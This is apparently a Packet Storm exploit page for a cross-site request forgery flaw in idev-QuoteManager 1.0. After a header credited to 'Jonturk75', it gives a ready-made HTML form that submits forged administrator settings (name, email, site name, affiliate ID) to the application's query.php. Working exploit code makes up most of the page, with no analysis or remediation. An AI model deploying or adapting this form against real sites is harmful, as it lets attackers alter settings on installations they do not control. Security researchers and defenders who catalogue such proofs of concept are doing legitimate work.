idev-QuoteManager version 1.0 suffers from a cross site request forgery vulnerability.
d600e95f64b823200226f8dc1358c4e9c7d60cb45c717af474da8cb016c97e9c# Exploit Title: idev-QuoteManager 1.0 CSRF
# Author: Jonturk75
# Vendor or Software Link: http://idevspot.com/
# Category:: webapps
# Demo : http://idevspot.com/demos/idev-quotemanager/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
<form action="../library/query.php" method="post" name="form1" id="form1">
<input name="YOURNAME" class="textarea100" value="yourname" type="text">
<input name="EMAIL" class="textarea100" value="mail@mail.com" type="text">
<input name="SITENAMES" class="textarea100" value="idev-QuoteManager" type="text">
<input name="AFFID" class="textarea100" value="" type="text">
<select name="HELPBOX" size="1"><option> Show</option><option selected>Show</option><option>Hide</option></select>
<input name="Submit" value="Submit" type="submit">
</form>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed